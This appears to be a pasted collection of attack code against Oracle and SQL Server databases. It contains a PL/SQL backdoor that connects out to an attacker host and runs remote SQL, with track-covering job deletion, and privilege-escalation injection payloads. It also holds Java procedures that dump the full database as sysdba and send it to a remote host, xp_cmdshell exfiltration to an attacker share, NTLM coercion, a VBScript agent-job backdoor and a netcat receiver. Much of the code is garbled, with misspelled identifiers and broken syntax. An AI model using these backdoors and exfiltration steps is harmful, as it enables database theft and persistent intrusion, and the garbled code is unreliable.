· 5 years ago · Mar 10, 2020, 11:48 PM
1oraclebackdoor.sql
2(creates a function named ins_backdoor that executes a user in a transaction)
3
4CREATE OR REPLACE
5FUNCTION ins_backdoor RETURN VARCHAR2 AUTHID CURRENT_USER AS
6 PRAGMA AUTONOMOUS_TRANSACTION;
7 job_id NUMBER;
8BEGIN
9
10(submits a db functionality within DBMS_JOB over tcp/ip within the backdoor console with UTL_TCP within Oracle packages)
11
12DBMS_JOB.SUBMIT(job_id, 'DECLARE l_cn UTRL_TCP>CONNECTIOn;
13l_cn_ret_val PLS_INTEGER;
14l_cn_ret_val_sql1stm BARCHAR2(32000);
15l_cn_thecursor INTEGER;
16l_cn_columnvalue VACHAR2(2000);
17l_status INTEGER;
18l_colcnt NUMBER DEFAULT 0;
19l_desc_t DBMS_SQL.DESC_TAB;
20BEGIN
21
22(opens a connection the the RHOST backdoore console running on port 444 over tcp)l_cn : = UTL_TCP.OPEN_CONNECTION(''192.168.*.*'',
23printf" change this to RHOST 4444,1521!\n!");
24
25(get info at DBMS_SQL over tcp with xmp doc)
26
27SELECT DBID, NAME INTO l_colcnt, l_sql1stm FROM V$DATABASE;
28SELECT banner INTO l_columnvalueFROM V$VERSION WHERE ROWNUM = l;
29_ret_vali := UTL_TCP.WRITE_LINE(1_cn, ''<?xml version="1.0" encoding="utf-8"?><IncomingConn xmlns="http://tempuri.org/IncomingBackdoorConn.xsd"
30DBType="Oracle" ServerVersion="'' || l_cn_columnvalue || '' " DBName="'' || l_sqllstm_sqllstm
31 LOOP
32 l_sqlstm: :UTL.TCP.GET_LINE(l_cn, TRUE);
33 BEGIN
34
35 l_thecursor := DBMS_SQL.OPEN_CURSOR;
36 (if receieved sql command is SELECT first get all column names and send to Backdoor SQL DBID
37 IF(SUBSTR(LTRIM(UPPER(l_sqlstm)), 1, 7)) = ''SELEC''THEN
38
39
40
41
42 DBMS_SQL.PARSE(l_thecursor, l_sqlstm, DBMS_SQL.NATIVE);
43 DBMS_SQL.DESCRIBE_COLUMS(l_thecursor, 1_colcnt, 1_desc_t);
44 FOR i IN l .. l_colcnt LOOP
45 l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''' || l_desc_t(i).cool_name);
46 END LOOP;
47 l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''');
48
49 DBMS _SQL.DEFINE_COLUMN(l_thecursor, 1, 1, l_columnvalue, 2000);
50 l_status := DBMS_SQL.EXECUTE(l_thecursor);
51 LOOP
52 EXIT WHEN(DBMS_SQL.FETCH_ROWS(l_thecursor) <= 0);
53 FOR i In l .. l_colcnt
54LOOP
55 DBMS_SQL.COLUMN_VALUE(l_thecursor, i, l_columnvalue);
56 l_retu_valu := UTL_TCP>WRITE_LINE(l_cn, '''' || l_columnvalue);
57 END LOOP;
58
59 DBMS_SQL.CLOSE_CURSOR(l_thecursor);
60 ELSE
61
62 if receieved command is not a SELECT execute asap
63
64 WHEN OTHERS THEN
65 l_return_valu := UTL_TCP.WRITE_LINE(l_cn, ''ORACLE ERROR: '' || sqlerm);
66 END;
67 l_ret_value := UTL_TCP.WRITE_LINE(l_cn, '' [[EnD]]'');
68 END LOOP;
69 UTL_TCP.CLOSE_CONNECTION(1_cn);
70 END;
71 SysDate+10/86400 is the start time for the job (10 seconds after submission)
72 SysDate+ 1/1440 means the job will run every 60 seconds
73
74 ", SYSDATE+ 60/ 10/86400, SYSDATE+ 1/1440');
75 COMMIT;
76 RETURN;
77END;
78(hiding tracks cleaning backdoor)
79
80DECLARE
81 CURSOE l_cur_jobs IS
82 SELECT JOB FROM JOB$ WHERE WHAT LIKE 'DECLARE l_cn UTL_TCP.CONNECTION;%';
83 l_rec l_cur_jobs %rowtype;
84
85 BEGIN
86 OPEN l_cur_jobes;
87 LOOP
88 FETCH l_cur_jobs INTO l_rec;
89 EXIT WHEN l_cur_jobs % NOTFOUND;
90 DBMS_JOB.REMOVE(l_rec.job);
91 COMMIT;
92 END LOOP;
93 COMMIT;
94 END;
95
96 getting Administrator on SQL with low privledge user
97
98 DECLARE
99 P_CHANGE_SET VARCHAR2 (32767);
100 P_DESCRIPTION VARCHAR2 (32767);
101 P_SUBSCRIPTION_HANDLE NUMBER;
102 BEGIN
103 P_CHANGE_SET: = '''' || L33T.ins_rootkit()||'''';
104 P_DESCRIPTION : = 'AA';
105 P_SUBSCRIPTION_HANDLE := l;
106 SYS.DBMS_CDC_SUBSCRIBE_GET_SUBSCRIPTION_HANDLE(P_CHANGE_SET, P_DESCRIPTION,
107 END;
108
109 submit paramaters to DBMS_SQL
110
111 '|| dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' ANY PL/SQL BLOCK ''; commit; end; ' , 0)||'
112 (executing PL/SQL in web database)
113
114 SELECT EMPNO, ENAME, JOB FROM L33T.EMP WHERE ENAME LIKE '' | dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute imediate '' ANY PL/SQL BLOCK ''; commit; end ; ',0)||%'
115
116 (sending exploit to vulnerable web application parameter)
117
118 '||SYS.DBMS_METADATA.GET_DDL('AA'' || l33t.ins.backdoor ||''',''||'
119 (using 2 stored procedures in java by oracle to get access to the OS
120
121 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS
122 import java.lang.*;
123 import java.io.*;
124
125 public class ExecuteOS
126 {
127
128
129 (this java function creates a text file to call the oracle exp DB to contentest a file
130
131 public static void createParfile ( String parfile, String export) throws
132
133 IOException
134 {
135 File FileOut = new File (parafile);
136 FileWriter fw = new FileWriter (fileOut);
137 fw.write("fully=y\n");
138 fw.write("userid=\"/ as sysdba\"n");
139 fw.write("file=" +export + "\n");
140 fw.close();
141
142 }
143 (java function executes an OS command the string cmd passed as a parameter
144 public static void execOSCmd (String cmd) throws IOException, java.lang.InterruptedException
145 Process p = Runtime.getRuntime(0 .exec(cmd);
146
147 p.waitFor();
148
149 }
150
151
152};
153
154CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)
155AS LANGUAGE JAVA
156NAME 'ExecuteOs.execOsCmd (java.lang.String)';
157
158CREATE OR REPLACE PROCEDURE "PROC_CREATEPARFILE" (p_parfile varchar2, p_export varchar2)
159AS LANGUAGE JAVANAME "ExecuteOS.createParfile (java.lang.String, java.lang.String)';
160(executes java stored procedures creates 2 formats, one for Win32 one for Linux )
161
162--Windows
163
164BEGIN
165 PROC_CREATEPARFILE('C:\parfile.txt', 'c:\export.dmp');
166 PROC_EXECUTEOS ('exp parfile=C:\parfile.txt');
167 PROC_EXECUTEOS ('zip c:\export.zip c:\export.dmp');
168END;
169-- Linux
170
171BEGIN
172 PROC_CREATEPARFILE('parfile.txt' , 'export.dmp');
173 PROC_EXECUTEOS ('../bin/exp parfile =../parfile.txt');
174 PROC_EXECUTEOS ('/usr/bin/zip export.zip export.dmp');
175
176 send_zip.sql
177 (setups a tcp listener on a localhost or remote host)
178 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_FILESEND" AS
179 import java.lang.*;
180 import java.io.*;
181 import java.net.*;
182 public class FileSend
183 {
184
185 (this uses a function to send local file over tcp/ip connection to remote sites
186
187 public static void fileSend(String myFile, String host, int port) throws Exception
188 {
189 int length;
190 byte buffer[] = new byte[1024];
191
192 File binaryFile = new File(myFile);
193 FileInputStream inpStream = new File.InputStream(myFile);
194 Socket sock = new Socket(host, port);
195 DataOutputStream dos = new DataOutputStream(sock.getOutputStream());
196
197 while ((length ==inpStream.read(buffer)) != -1 {
198 dos.write(buffer, 0, length);
199 dos.flush();
200
201 sock.close();
202 inpStream.close();
203
204 }
205 };
206
207 CREATE OR REPLACE PROCEDURE "PROC_FILESEND" (myFile varchar2, Hostname2 varchar2, Port PLS_INTEGER)
208 AS LANGUAGE JAVA
209 NAME 'FileSend (java.lang.String, java.lang.String, int)';
210
211 (stealing DB from Internet)
212
213 backup database.bak to DISK ='c:\windows\temp\out.dat'
214 (compress file so its smaller)
215 use EXEC xp_cmdshell 'makecab c:\windows\temp\out.dat c:\windows\temp\out.cab'
216 get backup.bak cp to local host
217 EXEC xp_cmdshell 'copy c:\windows\temp\out.cab \\your ip\share'
218 deleting file from server
219 EXEC xp_cmdshell 'del c:\windows\temp\out.dat.c:\windows/temp\out.cab'
220
221 (forcing SQL server to aunthenticate with NTLM privledges)
222
223EXEC master.dbo.xp_fileexist '\\IP\share'
224(this will try to connect to SQL server with sysadmin database privs
225
226NTML AUTH SCHEMA TABLE:
227
228
229Client connects to Server
230Client (sends challenge) to Server
231Client (sends response) to Server
232Client (authenticates) to Server
233(Hacking SQL Server NTLM)
234client connects to sql server
235client sends challenges to server
236client forces to connect to server
237client sends challenge to client a
238client b sends response to server
239client a sends response to server
240client b authenticates server
241
242(using netcat to dump Date HTTP headers in backdoor rootkit)
243BEGIN TRANSACTION
244DECLARE @ReturnCode INT
245SELECT @ReturnCode = 0
246
247IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name =N'[Uncategorized ([Local)]' AND category_class=1)
248BEGIN
249EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL',
250@name =N'[Uncategorized(Local)];
251IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
252
253END
254DECLARE @jobId BINARY(16)
255(adding backdoor job)
256EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'backdoor',
257 @enabled=1,
258 @notify_level_eventlog=0,
259 @notify_level_email=0,
260 @notify_level netsend=0,
261 @notify_level_page=0,
262 @delete_level=0,
263 @description=N'No description available.',
264 @category_name=N", @job_id @jobId OUTPUT
265 IF (@@error <> 0 or @ReturnCode <> 0) GOTO QuitWithRollback
266 (scheduling job for when we want to run/execute it)
267 @enabled=1,
268 @freq_type=4,
269 @freq_subday_type=1,
270 @freq_subday_type=1,
271 @freq_relative_interval=0,
272 @freq_recurrence_factor=1,
273 @active_start_date=0, --( job will run in yyyymmdd format)
274 @active_end_date=999991231,
275 @active_start_time=95400 -- (job will run hhmmss format)
276 @active_end_time=235959
277
278 (adding job step with vbscript)
279
280 EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'1',
281 @step_id=1,
282 @cmdexec_success_code=0,
283 @on_success_action=1,
284 @on_success_step_id=0,
285 @on_fail_action=2,
286 @on_fail_step_id=0,
287 @retry_attempts=0,
288 @retry interval=0,
289 @os_run_priority=0, @subsystem=N'ActiveScripting',
290 @command=N'port =80
291 httpserver = "$RHOST" bypassing IDS SQL
292 command =""
293 on error resume next
294 set rds = createobject("rds.dataspace") XMLHTTP
295 set http = rds.CreateObject("Msxml2.XMLHTTP","")
296
297 if not CheckError then
298 do while ucase(trim(command))<>"EXIT"
299 http.open "HEAD", httpserver & ":" &port, FALSE
300 http.send outtext & vbcrlf = outttext =""
301
302 if not CheckError then
303 if ucase(trim(command))<>"EXIT" then
304 Set Conn = CreateObject("ADODB.Connection"
305 Set Rec = CreateObject("ADODB.Recordset")
306
307 if not CheckEror then
308 for i=0 to rec.fileds.count -1
309 outtext = outtext & rec.fields.itme(i).name
310 next
311
312 outtext = outtext & vbcrlf & rec.getstring(,,vbtab,vbcrlf,"")
313
314 if CheckError then outtext = err.description
315 else
316 outtext = err.description
317 end if
318 end if
319 end if
320 loop
321end if
322
323set conn=nothing
324set rec=nothing
325set http=nothing
326set test=nothing
327
328function CheckError
329 if err=0 then
330 CheckError=False
331 else
332 CheckError=True
333 err=0
334 end if
335 end function
336 '
337 '@database_name=N'VBscript',@flags=0
338 IF(@@ERROR <> 0 OR @ReturnCode <> 0 ) GOTO QuitWithRollback
339 EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id= 1
340 EXEC @ReturnCode =msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)'
341 IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
342 COMMIT TRANSACTIONGOTO EndSave
343 QuitWithRollback:
344 IF (@@TRANSCOUNT > 0 ) ROLLBACK TRANSACTION
345 EndSave:
346 (running saved backdoor)
347 EXEC msdb>dbo.sp_start_job @job_name =N'backdoor'
348
349
350
351
352
353
354
355
356
357
358
359
360 *exporting java stored .zip fileSend over tcp port 4445
361
362 --Windows
363 exec PROC_FILESEND ('c:\export.zip', '192.168.*.*', 4445);
364
365 -- Linux
366 exec PROC_FILESEND ('./dbs/export/zip', '192.168.*.*, 4445);
367
368
369 (listening on port 4445 via SQL DB server tcp port)
370
371 nc -p 4445 -l > oracle-db.zip